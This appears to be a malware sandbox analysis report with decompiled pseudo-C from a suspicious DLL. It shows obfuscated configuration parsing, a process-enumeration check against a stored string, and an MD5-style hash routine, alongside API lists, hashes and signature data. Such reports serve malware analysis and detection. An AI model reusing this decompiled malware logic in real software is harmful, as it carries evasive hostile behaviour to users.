				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0xecd278; // 0x63699bc3
				if(E00EC8748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0xecd2d4 = _v12;
				}
				_t25 =  *0xecd278; // 0x63699bc3
				if(E00EC8748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0xecd278; // 0x63699bc3
						_t31 = E00EC3F7C(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0xecd240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0xecd278; // 0x63699bc3
						_t32 = E00EC3F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0xecd244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0xecd278; // 0x63699bc3
						_t33 = E00EC3F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0xecd248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0xecd278; // 0x63699bc3
						_t34 = E00EC3F7C(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0xecd004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0xecd278; // 0x63699bc3
						_t35 = E00EC3F7C(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0xecd02c = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0xecd278; // 0x63699bc3
						_t36 = E00EC3F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E00EC6ED2(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E00ECA5D6();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0xecd278; // 0x63699bc3
						_t37 = E00EC3F7C(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E00EC6ED2(0, _t37) != 0) {
						_t102 =  *0xecd32c; // 0x30095b0
						E00EC75E9(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0xecd278; // 0x63699bc3
						_t38 = E00EC3F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0xecd27c; // 0x213a5a8
						_t18 = _t39 + 0xece252; // 0x616d692f
						 *0xecd2d0 = _t18;
						goto L52;
					} else {
						_t49 = E00EC6ED2(0, _t38);
						 *0xecd2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0xecd278; // 0x63699bc3
								_t41 = E00EC3F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0xecd27c; // 0x213a5a8
								_t19 = _t42 + 0xece791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E00EC6ED2(0, _t41);
							}
							 *0xecd340 = _t43;
							HeapFree( *0xecd238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}


































                                                  0x00ec4094
                                                  0x00ec4097
                                                  0x00ec40b7
                                                  0x00ec40c5
                                                  0x00ec40c5
                                                  0x00ec40ca
                                                  0x00ec40e4
                                                  0x00ec42e2
                                                  0x00ec42e4
                                                  0x00000000
                                                  0x00ec40ea
                                                  0x00ec40ea
                                                  0x00ec40f1
                                                  0x00ec4107
                                                  0x00ec40f3
                                                  0x00ec40f3
                                                  0x00ec4100
                                                  0x00ec4100
                                                  0x00ec4111
                                                  0x00ec4113
                                                  0x00ec411d
                                                  0x00ec4122
                                                  0x00ec4122
                                                  0x00ec411d
                                                  0x00ec4129
                                                  0x00ec413f
                                                  0x00ec412b
                                                  0x00ec412b
                                                  0x00ec4138
                                                  0x00ec4138
                                                  0x00ec4143
                                                  0x00ec4145
                                                  0x00ec414f
                                                  0x00ec4154
                                                  0x00ec4154
                                                  0x00ec414f
                                                  0x00ec415b
                                                  0x00ec4171
                                                  0x00ec415d
                                                  0x00ec415d
                                                  0x00ec416a
                                                  0x00ec416a
                                                  0x00ec4175
                                                  0x00ec4177
                                                  0x00ec4181
                                                  0x00ec4186
                                                  0x00ec4186
                                                  0x00ec4181
                                                  0x00ec418d
                                                  0x00ec41a3
                                                  0x00ec418f
                                                  0x00ec418f
                                                  0x00ec419c
                                                  0x00ec419c
                                                  0x00ec41a7
                                                  0x00ec41a9
                                                  0x00ec41b3
                                                  0x00ec41b8
                                                  0x00ec41b8
                                                  0x00ec41b3
                                                  0x00ec41bf
                                                  0x00ec41d5
                                                  0x00ec41c1
                                                  0x00ec41c1
                                                  0x00ec41ce
                                                  0x00ec41ce
                                                  0x00ec41d9
                                                  0x00ec41db
                                                  0x00ec41e5
                                                  0x00ec41ea
                                                  0x00ec41ea
                                                  0x00ec41e5
                                                  0x00ec41f1
                                                  0x00ec4207
                                                  0x00ec41f3
                                                  0x00ec41f3
                                                  0x00ec4200
                                                  0x00ec4200
                                                  0x00ec420b
                                                  0x00ec420d
                                                  0x00ec4210
                                                  0x00ec4211
                                                  0x00ec4218
                                                  0x00ec421a
                                                  0x00ec421b
                                                  0x00ec421b
                                                  0x00ec4218
                                                  0x00ec4222
                                                  0x00ec4238
                                                  0x00ec4224
                                                  0x00ec4224
                                                  0x00ec4231
                                                  0x00ec4231
                                                  0x00ec423c
                                                  0x00ec424a
                                                  0x00ec4254
                                                  0x00ec4254
                                                  0x00ec425b
                                                  0x00ec4271
                                                  0x00ec425d
                                                  0x00ec425d
                                                  0x00ec426a
                                                  0x00ec426a
                                                  0x00ec4275
                                                  0x00ec4288
                                                  0x00ec4288
                                                  0x00ec428d
                                                  0x00ec4293
                                                  0x00000000
                                                  0x00ec4277
                                                  0x00ec427a
                                                  0x00ec4281
                                                  0x00ec4286
                                                  0x00ec4298
                                                  0x00ec429a
                                                  0x00ec42b0
                                                  0x00ec429c
                                                  0x00ec429c
                                                  0x00ec42a9
                                                  0x00ec42a9
                                                  0x00ec42b4
                                                  0x00ec42c0
                                                  0x00ec42c5
                                                  0x00ec42c5
                                                  0x00ec42b6
                                                  0x00ec42b9
                                                  0x00ec42b9
                                                  0x00ec42d3
                                                  0x00ec42d8
                                                  0x00ec42e5
                                                  0x00ec42e9
                                                  0x00ec42e9
                                                  0x00000000
                                                  0x00ec4286
                                                  0x00ec4275

                                                  APIs
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00EC23DE,?,63699BC3,00EC23DE,?,63699BC3,00000005,00ECD00C,00000008,?,00EC23DE), ref: 00EC4119
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00EC23DE,?,63699BC3,00EC23DE,?,63699BC3,00000005,00ECD00C,00000008,?,00EC23DE), ref: 00EC414B
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00EC23DE,?,63699BC3,00EC23DE,?,63699BC3,00000005,00ECD00C,00000008,?,00EC23DE), ref: 00EC417D
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00EC23DE,?,63699BC3,00EC23DE,?,63699BC3,00000005,00ECD00C,00000008,?,00EC23DE), ref: 00EC41AF
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00EC23DE,?,63699BC3,00EC23DE,?,63699BC3,00000005,00ECD00C,00000008,?,00EC23DE), ref: 00EC41E1
                                                  • HeapFree.KERNEL32(00000000,00EC23DE,00EC23DE,?,63699BC3,00EC23DE,?,63699BC3,00000005,00ECD00C,00000008,?,00EC23DE), ref: 00EC42D8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 1cf58f37567481899b1acfaee8d81245989a1ba9b670ac3da89890c348b56dd9
                                                  • Instruction ID: 723ae5ed2eee99bcdec2b10d887249c87890b26ebed0057752cc452a0ad983b2
                                                  • Opcode Fuzzy Hash: 1cf58f37567481899b1acfaee8d81245989a1ba9b670ac3da89890c348b56dd9
                                                  • Instruction Fuzzy Hash: 2661A2F0A14104AECB24EBB5DE95F9BB7ED9B48314729693DB401F3264E633DA878710
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC757F, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E00EC757F() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xecd27c; // 0x213a5a8
						_t2 = _t9 + 0xecee54; // 0x73617661
						_push( &_v264);
						if( *0xecd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                  0x00ec758a
                                                  0x00ec7594
                                                  0x00ec7598
                                                  0x00ec75a2
                                                  0x00ec75d3
                                                  0x00ec75a9
                                                  0x00ec75ae
                                                  0x00ec75bb
                                                  0x00ec75c4
                                                  0x00ec75db
                                                  0x00ec75c6
                                                  0x00ec75ce
                                                  0x00000000
                                                  0x00ec75ce
                                                  0x00ec75dc
                                                  0x00ec75dd
                                                  0x00000000
                                                  0x00ec75dd
                                                  0x00000000
                                                  0x00ec75d7
                                                  0x00ec75e3
                                                  0x00ec75e8

                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EC758F
                                                  • Process32First.KERNEL32(00000000,?), ref: 00EC75A2
                                                  • Process32Next.KERNEL32(00000000,?), ref: 00EC75CE
                                                  • CloseHandle.KERNEL32(00000000), ref: 00EC75DD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 38a8fabe6fa62cdab9b8344f915ad7171f91fe130c9c2cbe6d5e51c33364fa1c
                                                  • Instruction ID: 78cbb90be8147bc6c724806765897e4f973726a1b74d3dcf89f57087995bb288
                                                  • Opcode Fuzzy Hash: 38a8fabe6fa62cdab9b8344f915ad7171f91fe130c9c2cbe6d5e51c33364fa1c
                                                  • Instruction Fuzzy Hash: 92F096716091255EDB20A7768F49FEB37ECDBD5354F001079F946F2101EA26CD4B4EA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401850, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00401850() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;
				void* _t12;

				_t8 =  *0x404130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x40413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t12 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 > 0) {
						L5:
						 *0x40412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x404128 = _t5;
						 *0x404130 = _t8;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x404124 = _t6;
						if(_t6 == 0) {
							 *0x404124 =  *0x404124 | 0xffffffff;
						}
						return 0;
					} else {
						_t12 = _t3 - _t3;
						goto L4;
					}
				}
			}










                                                  0x00401851
                                                  0x0040185f
                                                  0x00401867
                                                  0x0040186c
                                                  0x004018be
                                                  0x004018be
                                                  0x0040186e
                                                  0x00401876
                                                  0x0040187e
                                                  0x0040187e
                                                  0x004018ba
                                                  0x004018bc
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00401878
                                                  0x0040187a
                                                  0x00401880
                                                  0x00401880
                                                  0x00401885
                                                  0x00401893
                                                  0x00401898
                                                  0x0040189e
                                                  0x004018a6
                                                  0x004018ab
                                                  0x004018ad
                                                  0x004018ad
                                                  0x004018b7
                                                  0x0040187c
                                                  0x0040187c
                                                  0x00000000
                                                  0x0040187c
                                                  0x0040187a

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040164B,751463F0), ref: 0040185F
                                                  • GetVersion.KERNEL32 ref: 0040186E
                                                  • GetCurrentProcessId.KERNEL32 ref: 00401885
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0040189E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CreateCurrentEventOpenVersion
                                                  • String ID:
                                                  • API String ID: 845504543-0
                                                  • Opcode ID: 004d01fc8ae21b5471baf428e45af9b1c9454566fc09c3eb8f0851a9344703b7
                                                  • Instruction ID: 6ae184293567ded7ec2751506ec64a9140b7551cf56f667d9c7c58b5119fcc5d
                                                  • Opcode Fuzzy Hash: 004d01fc8ae21b5471baf428e45af9b1c9454566fc09c3eb8f0851a9344703b7
                                                  • Instruction Fuzzy Hash: 40F068B16412109AE710AF787F4DB553F98E759753F004236E644F92F4D37046818B5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00E4009C, Relevance: 2.8, Strings: 2, Instructions: 330COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647167015.0000000000E40000.00000040.00000001.sdmp, Offset: 00E40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e40000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: t32c$t32c
                                                  • API String ID: 0-1046649395
                                                  • Opcode ID: 08eca26c7f0e100eb80f4c9297a799a277dedc60c587fa9126c2fdbef6415b7c
                                                  • Instruction ID: fa635e764d37422595d01632084abc2039ede2360133458ede7fd3f924d50477
                                                  • Opcode Fuzzy Hash: 08eca26c7f0e100eb80f4c9297a799a277dedc60c587fa9126c2fdbef6415b7c
                                                  • Instruction Fuzzy Hash: 16D1267290111ADFDF24DF90DD84BAAB7B5FB88318F1492E4D609B7211D230AE85DF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC97F2, Relevance: 1.9, APIs: 1, Instructions: 610COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 50%
                                                  			E00EC97F2(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}



































































































                                                  0x00ec97f5
                                                  0x00ec9800
                                                  0x00ec9803
                                                  0x00ec9806
                                                  0x00ec9807
                                                  0x00ec9807
                                                  0x00ec9812
                                                  0x00ec9823
                                                  0x00ec9825
                                                  0x00ec9828
                                                  0x00ec9828
                                                  0x00ec982b
                                                  0x00ec982b
                                                  0x00ec982e
                                                  0x00ec982e
                                                  0x00ec9831
                                                  0x00ec9831
                                                  0x00ec984e
                                                  0x00ec9851
                                                  0x00ec9867
                                                  0x00ec986a
                                                  0x00ec9884
                                                  0x00ec9887
                                                  0x00ec989d
                                                  0x00ec98a0
                                                  0x00ec98a2
                                                  0x00ec98ba
                                                  0x00ec98bd
                                                  0x00ec98c0
                                                  0x00ec98d8
                                                  0x00ec98db
                                                  0x00ec98f5
                                                  0x00ec98f8
                                                  0x00ec990e
                                                  0x00ec9911
                                                  0x00ec9913
                                                  0x00ec992b
                                                  0x00ec9930
                                                  0x00ec9933
                                                  0x00ec9949
                                                  0x00ec994c
                                                  0x00ec9966
                                                  0x00ec9969
                                                  0x00ec997f
                                                  0x00ec9982
                                                  0x00ec9984
                                                  0x00ec999f
                                                  0x00ec99a2
                                                  0x00ec99b9
                                                  0x00ec99bc
                                                  0x00ec99c0
                                                  0x00ec99d9
                                                  0x00ec99dc
